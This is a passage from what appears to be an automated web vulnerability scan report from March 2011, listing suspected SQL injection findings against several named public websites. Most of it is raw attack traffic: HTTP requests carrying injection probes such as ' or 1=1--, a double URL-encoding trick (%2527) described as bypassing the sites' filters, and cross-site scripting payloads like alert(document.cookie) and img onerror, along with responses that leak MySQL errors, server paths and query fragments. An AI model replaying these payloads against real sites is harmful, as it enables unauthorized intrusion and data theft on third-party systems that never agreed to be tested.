Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20US%20Virgin%20Islands%20Resort%20holidays/288

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20US%20Virgin%20Islands%20Resort%20holidays/288' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.112. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:35 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=3ce2b08f2af5bcd9f92a4c82f8ffa1af; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 91977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<a href="http://www.cmswire.com/cms/enterprise-20/enterprise-20-rollup-learning-valuable-lessons-from-failure-010647.php"
               rel="permalink"
               title="Enterprise 2.0 Roll-up: Learning Valuable Lessons from Failure">
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:35 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=e3241157f39263515fa46115c31bb374; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.113. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364?1%2527=1 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=debaeaa17c120ccd13dcbdbf50682297; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 91977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<a href="http://www.cmswire.com/cms/enterprise-20/enterprise-20-rollup-learning-valuable-lessons-from-failure-010647.php"
               rel="permalink"
               title="Enterprise 2.0 Roll-up: Learning Valuable Lessons from Failure">
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364?1%2527%2527=1 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=ef1aeb9b4ec92a7d986f53c38dd976a7; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.114. http://www.forex-direkt.de/ [b35b2--%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.forex-direkt.de
Path:   /

Issue detail

The b35b2--%3E%3Cscript%3Ealert(document.cookie parameter appears to be vulnerable to SQL injection attacks. The payloads 14649737'%20or%201%3d1--%20 and 14649737'%20or%201%3d2--%20 were each submitted in the b35b2--%3E%3Cscript%3Ealert(document.cookie parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?b35b2--%3E%3Cscript%3Ealert(document.cookie14649737'%20or%201%3d1--%20 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Fri, 18 Mar 2011 16:05:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Sat, 17-Mar-2012 16:05:22 GMT; path=/
Set-Cookie: WPS_date=20110318; expires=Sat, 19-Mar-2011 16:05:22 GMT
Set-Cookie: WPS_display_count=0; expires=Sat, 19-Mar-2011 16:05:22 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Online Forex Trading Community</title>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.forex-direkt.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.forex-direkt.de/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Forex Direkt' href='http://www.forex-direkt.de/' />
<meta name="generator" content="WordPress 3.0.3" />

<!-- All in One SEO Pack 1.6.12.2 by Michael Torbert of Semper Fi Web Design[306,327] -->
<meta name="description" content="Online Forex Trading Community - hier lernen Sie Forex traden und erfahren Sie alles ..ber den Devisenhandel und FX Trading." />
<meta name="keywords" content="Forex, Online Forex, Forex Trading, traden, FX Trading, Devisenhandel" />
<!-- /all in one seo pack -->
<script language="JavaScript" type="text/javascript" src="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-edition/description_selection.js"></script><link rel="stylesheet" type="text/css" media="screen" href="http://www.forex-direkt.de/wp-content/plugins/sociable-
...[SNIP]...

Request 2

GET /?b35b2--%3E%3Cscript%3Ealert(document.cookie14649737'%20or%201%3d2--%20 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:05:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Sat, 17-Mar-2012 16:05:24 GMT; path=/
Set-Cookie: WPS_date=20110318; expires=Sat, 19-Mar-2011 16:05:24 GMT
Set-Cookie: WPS_display_count=0; expires=Sat, 19-Mar-2011 16:05:24 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Online Forex Trading Community</title>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.forex-direkt.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.forex-direkt.de/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Forex Direkt' href='http://www.forex-direkt.de/' />
<meta name="generator" content="WordPress 3.0.3" />

<!-- All in One SEO Pack 1.6.12.2 by Michael Torbert of Semper Fi Web Design[306,327] -->
<meta name="description" content="Online Forex Trading Community - hier lernen Sie Forex traden und erfahren Sie alles ..ber den Devisenhandel und FX Trading." />
<meta name="keywords" content="Forex, Online Forex, Forex Trading, traden, FX Trading, Devisenhandel" />
<!-- /all in one seo pack -->
<script language="JavaScript" type="text/javascript" src="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-edition/description_selection.js"></script><link rel="stylesheet" type="text/css" media="screen" href="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-
...[SNIP]...

1.115. http://www.gamespy.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.gamespy.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /?c6f81%22-alert(document.cookie HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Fri, 18 Mar 2011 16:06:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 18 Mar 2011 16:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c04-32473-437051038-2;Path=/;Domain=.gamespy.com;Expires=Sat, 14-Sep-30 16:06:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1300464390433v-1n-22mc+1300464390433mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com
Content-Length: 92161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>GameSpy: Video Game
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=141877&eid=1439009&file=http://cdn.eyewonder.com/100125/768609/1439009/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://clk.redcated/ULA/go/303391665/direct/01/" target="_blank">
...[SNIP]...

Request 2

GET /?c6f81%22-alert(document.cookie HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Fri, 18 Mar 2011 16:06:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 18 Mar 2011 16:06:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c07-6735-382974512-3;Path=/;Domain=.gamespy.com;Expires=Sat, 14-Sep-30 16:06:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1300464391744v-1n-22mc+1300464391744mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com
Content-Length: 90682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>GameSpy: Video Game
...[SNIP]...

1.116. http://www.hameaualbert.fr/misc/drupal.js1ca13">

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hameaualbert.fr
Path:   /misc/drupal.js1ca13"><img%20src=a%20onerror=alert(document.cookie

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /misc/drupal.js1ca13"><img%20src'=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=12f8218639673f8660ae007613072ebc; expires=Sun, 10-Apr-2011 19:42:32 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:12 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
<div class="messages error">
user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;onerror=alert(document.cookie&#039;&#039; at line 1
query: SELECT idrub FROM alias_photos WHERE p
...[SNIP]...

Request 2

GET /misc/drupal.js1ca13"><img%20src''=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=eaff2d9aa7ad2940d82ade23c2162d83; expires=Sun, 10-Apr-2011 19:42:33 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:13 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8292

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...

1.117. http://www.hameaualbert.fr/misc/drupal.js1ca13">0bfdceb7ad4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hameaualbert.fr
Path:   /misc/drupal.js1ca13"><img%20src=a%20onerror=alert(document.cookie)>0bfdceb7ad4

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /misc/drupal.js1ca13"><img%20src'=a%20onerror=alert(document.cookie)>0bfdceb7ad4 HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=7f5f46a449fe60562cadfd2050470483; expires=Sun, 10-Apr-2011 19:42:35 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:15 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
<div class="messages error">
user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;onerror=alert(document.cookie)&gt;0bfdceb7ad4&#039;&#039; at line 1
query: SELECT idrub FROM alia
...[SNIP]...

Request 2

GET /misc/drupal.js1ca13"><img%20src''=a%20onerror=alert(document.cookie)>0bfdceb7ad4 HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=b6a909cf0868800092ae9384c1d97f32; expires=Sun, 10-Apr-2011 19:42:36 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:16 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8318

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...

1.118. http://www.intranetjournal.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 15:59:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:00:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 151225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=792769967;u=j;z=20110318115937" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=792769967;u=j;z=20110318115937" alt="Click here"></a>
</noscript>
</span>
<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .menul
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 15:59:40 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:00:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 151215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=983649340;u=j;z=20110318115940" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=983649340;u=j;z=20110318115940" alt="Click here"></a>
</noscript>
</span>
<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .menul
...[SNIP]...

1.119. http://www.masstransitmag.com/online/article.jsp [id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.masstransitmag.com
Path:   /online/article.jsp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payloads 13150409'%20or%201%3d1--%20 and 13150409'%20or%201%3d2--%20 were each submitted in the id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d1--%20&pageNum=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:14:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=9480DF2361A4B8CC2E189CB9CBDB1696.transportation-app1; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 49345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

